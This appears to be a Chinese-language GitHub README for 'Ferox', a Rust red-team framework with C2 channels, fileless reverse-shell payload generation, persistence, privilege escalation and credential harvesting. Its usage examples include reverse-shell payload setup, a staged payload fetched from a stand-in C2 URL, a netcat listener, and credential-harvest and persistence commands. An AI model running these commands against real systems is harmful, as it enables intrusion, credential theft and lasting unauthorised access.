abdulwahed-sweden/ferox
GitHub: abdulwahed-sweden/ferox
一款基于 Rust 的综合性攻击性安全框架,为授权渗透测试和红队行动提供从侦察到后渗透的全流程工具链。
Stars: 1 | Forks: 0
# 🦊 Ferox Security Framework v4.1
[]()
[]()
[]()
[]()
**Ferox** 是一个现代的 Rust 原生攻击性安全框架,专为授权的渗透测试、安全研究和红队行动而设计。在构建时充分考虑了性能、安全性和可观测性。
## 4.1 版本更新内容
- **代码现代化** - 更新至 Rust 2021 版本,所有依赖均为最新
- **移动应用分析** - APK 和 IPA 安全评估模块
- **安全评估向导** - 用于全面评估的向导式工作流
- **增强的进度跟踪** - 实时进度与发现展示
- **桌面应用程序** - 基于 React 的现代 Tauri 界面
## 🚀 快速开始
### 安装
```
git clone https://github.com/abdulwahed-sweden/ferox
cd ferox
cargo build --release --features memory-forensics
```
### 首次运行
```
# 系统诊断
./target/release/ferox doctor check
# 启动 console
./target/release/ferox console
# 内存取证
./target/release/ferox memory analyze dump.raw --output report.json
```
## 🎯 核心功能
### 🔍 内存取证
- Volatility3 集成
- YARA 扫描
- MITRE ATT&CK 映射
- 导出格式:JSON, Markdown, 表格
### 🛰️ 命令与控制 (C2)
- Teams Tunnel C2
- HTTP beacon
- DNS C2
- 中继管理器
### 🎯 智能 Payload 系统 (Phase 4)
- **无文件 Reverse TCP**,采用 AES-256-GCM 加密
- **多阶段 payload**(Stage-1 stager + Stage-2 payload)
- **跨平台支持**:Windows, Linux, macOS, Universal
- **执行命令生成器**:针对不同操作系统提供可直接粘贴的命令
- **Listener 命令助手**:Netcat, Socat, Metasploit, Python
- **C2 集成**:Teams, GitHub Gist, DNS-over-HTTPS, HTTP Beacon
### 📱 移动应用分析 (4.0 版本新增)
- **APK 分析器** - Android 应用安全分析
- Manifest 解析与权限分析
- 代码反编译与机密信息检测
- 网络安全配置分析
- 证书验证检查
- **IPA 分析器** - iOS 应用安全分析
- Info.plist 分析与 entitlements 提取
- 二进制保护检查 (PIE, ARC, stack canaries)
- URL scheme 与 deep link 分析
- 第三方 SDK 检测
- **应用侦察** - 应用商店情报收集
### 🔧 安全操作
- 侦察 (ASN, DNS, WHOIS, 子域名)
- 高速扫描
- 漏洞利用(授权)
- 后渗透:凭据、持久化、横向移动
### 🔒 后渗透引擎 (Phase 5)
- **持久化引擎**:具备 14 种方法的多平台持久化
- Windows: Registry Run, Scheduled Tasks, WMI Events, Services, Startup Folder
- Linux: Cron, Systemd, Shell RC, XDG Autostart
- macOS: Launch Agents/Daemons, Login Items
- 根据权限和隐蔽性要求自动选择
- 内置冗余支持
- **权限提升引擎**:全面的 privesc 枚举
- Windows: UAC Bypass (fodhelper, eventvwr, sdclt), Token Impersonation, Service Exploits
- Linux: Sudo abuse, SUID/SGID binaries, Kernel exploits, Capabilities
- 为所有技术提供 MITRE ATT&CK 映射
- GTFOBins 集成参考
- **凭据收集引擎**:多源凭据提取
- Windows: LSASS, SAM, Credential Manager, 浏览器密码
- Linux: /etc/shadow, SSH keys, GNOME Keyring, 浏览器凭据
- macOS: Keychain, 浏览器密码
- 跨平台:云凭据 (AWS/Azure/GCP), Git token
- 敏感度分类与脱敏支持
### 🗂 系统管理
- SQLite 会话跟踪
- 防篡改审计日志
- 针对危险模块的安全模式
- 基于策略的授权
## 🛠️ 使用示例
### 交互式控制台
```
ferox> use scanner/port
ferox (scanner/port)> set RHOSTS 10.0.0.0/24
ferox (scanner/port)> set PORTS 1-1000
ferox (scanner/port)> run --json > scan_results.json
```
### 内存分析
```
ferox memory analyze memory.dmp --database analysis.db
ferox memory malfind memory.dmp --min-score 0.6 --mitre
ferox memory pslist memory.dmp --format table
```
### 系统诊断
```
ferox doctor check --critical
ferox doctor check --format json
ferox doctor dependency python
ferox doctor dependency volatility
```
### C2 操作
```
ferox c2 list --status active
ferox c2 setup teams_tunnel --team-id "security-team"
ferox c2 test http_beacon --target http://target.com
```
### 智能 Payload 生成
```
# 交互式 payload 生成
ferox> use payloads/rev_tcp_fileless
ferox (payloads/rev_tcp_fileless)> set LHOST 192.168.1.100
ferox (payloads/rev_tcp_fileless)> set LPORT 4444
ferox (payloads/rev_tcp_fileless)> set TARGET_OS windows
ferox (payloads/rev_tcp_fileless)> run
# 输出包括:
# - 加密 payload (Base64/Hex)
# - 可直接粘贴的执行命令:
# - PowerShell Base64 解码并执行
# - PowerShell 编码命令
# - 通过 PowerShell 执行 CMD
# - Listener 命令:
# - nc -lvnp 4444
# - msfconsole multi/handler
# 带有 C2 的 Staged payload
ferox (payloads/rev_tcp_fileless)> set STAGED true
ferox (payloads/rev_tcp_fileless)> set C2_URL https://c2.example.com/stage2
ferox (payloads/rev_tcp_fileless)> run
```
### 持久化引擎
```
# 列出所有 persistence 方法
ferox persist list
# 自动安装 persistence(安全模式)
ferox persist auto --platform windows --payload /path/to/agent --redundancy 2
# 显示方法详情
ferox persist describe registry_run_hkcu
# 验证/移除 persistence
ferox persist verify
ferox persist remove
```
### 权限提升引擎
```
# 列出可用的 enumerators
ferox privesc list
# 自动 enumerate 并 exploit(安全模式)
ferox privesc auto --platform windows --command cmd.exe
# 对特定平台进行 enumerate
ferox privesc enumerate --platform linux --category sudo
# 显示技术详情
ferox privesc describe uac_bypass
```
### 凭据收集引擎
```
# 列出可用的 harvesters
ferox creds list --platform windows
# Harvest 凭据(安全模式)
ferox creds harvest --platform linux --category all
# 按类别筛选
ferox creds harvest --platform windows --category browser
# 显示 harvester 详情
ferox creds describe lsass_memory
# 显示 harvested 凭据
ferox creds show
```
### 移动应用分析
```
# Android APK 分析
ferox> use mobile/apk_analyzer
ferox (mobile/apk_analyzer)> set APK_PATH /path/to/app.apk
ferox (mobile/apk_analyzer)> run
# iOS IPA 分析
ferox> use mobile/ipa_analyzer
ferox (mobile/ipa_analyzer)> set IPA_PATH /path/to/app.ipa
ferox (mobile/ipa_analyzer)> run
# App Store 侦察
ferox> use mobile/app_recon
ferox (mobile/app_recon)> set BUNDLE_ID com.example.app
ferox (mobile/app_recon)> run
```
### 安全评估向导
```
# 启动交互式向导
ferox> wizard
# 选择评估模板:
# 1. 全面 Penetration Test
# 2. Web 应用评估
# 3. 网络安全审计
# 4. 移动应用评估
# 5. Cloud 安全审查
```
## 🎨 界面 — 混合 Predator 主题
- 深色、高对比度安全配色
- 极简动画(平静的 UI)
- 终端优化排版
- 清晰的状态符号 (✅ ❌ ⚠️ ℹ️)
## 🛡️ 安全模式示例
```
SAFE_MODE=1 ferox --mock run c2/teams_tunnel
SAFE_MODE=1 ferox console
```
## 🔧 架构
```
Ferox CLI Integration Layer
↓
[doctor, memory, c2, sessions, persist, privesc, creds, console]
↓
Module Registry & Session Manager
↓
Security Engine (Async Rust)
↓
[Scanner, Recon, Exploit, Payloads, Memory, C2, Post, Auxiliary]
↓
┌─────────────────────────────────────────────────────────────┐
│ Smart Payload Engine (AES-256-GCM, HKDF, Multi-Stage) │
│ Persistence Engine (14 methods, 3 platforms) │
│ Privilege Escalation Engine (7 enumerators, 2+ exploits) │
│ Credential Harvesting Engine (12 harvesters, 3 platforms) │
└─────────────────────────────────────────────────────────────┘
```
## 📦 模块类别
| 类别 | # | 描述 |
| --------------------- | --- | ----------------------------------------------- |
| Scanner | 8 | 端口与服务检测 |
| Recon | 6 | 信息收集 |
| **Mobile** | 3 | APK/IPA 分析,应用侦察 |
| Exploit | 4 | 授权漏洞利用 |
| **Payloads** | 3 | 带加密的智能 payload 生成 |
| Memory Forensics | 8 | Volatility3 工作流 |
| **Post-Exploitation** | 33+ | 持久化 (14), 权限提升 (7), 凭据 (12) |
| C2 & Evasion | 12 | 通信与隐匿 |
| Auxiliary | 5 | 实用工具模块 |
## 🩺 Ferox Doctor — 诊断引擎
```
# 全面检查
ferox doctor check
# Dependency 检查
ferox doctor dependency python
ferox doctor dependency volatility
# 自动修复(在支持的情况下)
ferox doctor check --fix
# 格式
ferox doctor check --format json
ferox doctor check --format markdown
```
## 🔒 安全与授权
**Ferox 专为授权的安全工作而设计。**
### 允许
- 授权的渗透测试
- 红队评估
- 安全研究
- CTF
- 防御性培训
### 禁止
- 未经授权的访问
- 犯罪活动
- 恶意操作
- 违反法律/法规
### 内置安全防护
- 授权上下文
- 不可变审计日志
- 针对高风险模块的安全模式
- 基于策略的访问控制
## 🖥️ Ferox 桌面版
使用 Tauri 和 React 构建的专业 C2 操作控制台:
```
cd ferox-desktop
npm install
cargo tauri dev # Development
cargo tauri build # Production build
```
**功能:**
- 具备实时更新的实时会话管理
- 带有命令历史记录的集成终端
- 后渗透模块仪表盘
- 会话树可视化
- 为操作优化的深色主题。
详情请参阅[桌面版文档](docs/developer/architecture.md)。
## 📚 文档
- [docs/README.md](docs/README.md) — 文档索引
- [docs/INSTALLATION.md](docs/INSTALLATION.md) — 安装指南
- [docs/user-guide/](docs/user-guide/) — 最终用户文档
- [docs/developer/](docs/developer/) — 开发者文档
- [docs/api/](docs/api/) — API 参考
## 🛣️ 路线图
- [x] v2.0.0 – 内存取证引擎
- [x] **Phase 4** – 带有执行命令生成器的智能 Payload 系统
- [x] **Phase 5** – 后渗透引擎(持久化、权限提升、凭据)
- [x] **Phase 6** – Ferox 桌面版(Tauri + React 操作控制台)
- [x] **v4.0.0** – 移动应用分析 (APK/IPA) 与安全评估向导
- [ ] 签名插件市场
- [ ] 硬件支持的凭据保险库
- [ ] 扩展的规避技术
## 📄 许可证
在 MIT 许可证下发布。仅限于符合道德规范和授权的场景使用。
## 📬 支持
- 维护者:Abdulwahed Mansour
- 邮箱:abdulwahed.mansour@gmail.com
- 安全联系人:security@ferox.local
- GitHub:@abdulwahed-sweden
快速。凶猛。无畏。已授权。🦊
标签:C2框架, DNS 反向解析, IP 地址批量处理, Rust, SecList, 内存取证, 可视化界面, 安全学习资源, 渗透测试框架, 移动应用分析, 网络流量审计, 通知系统, 防御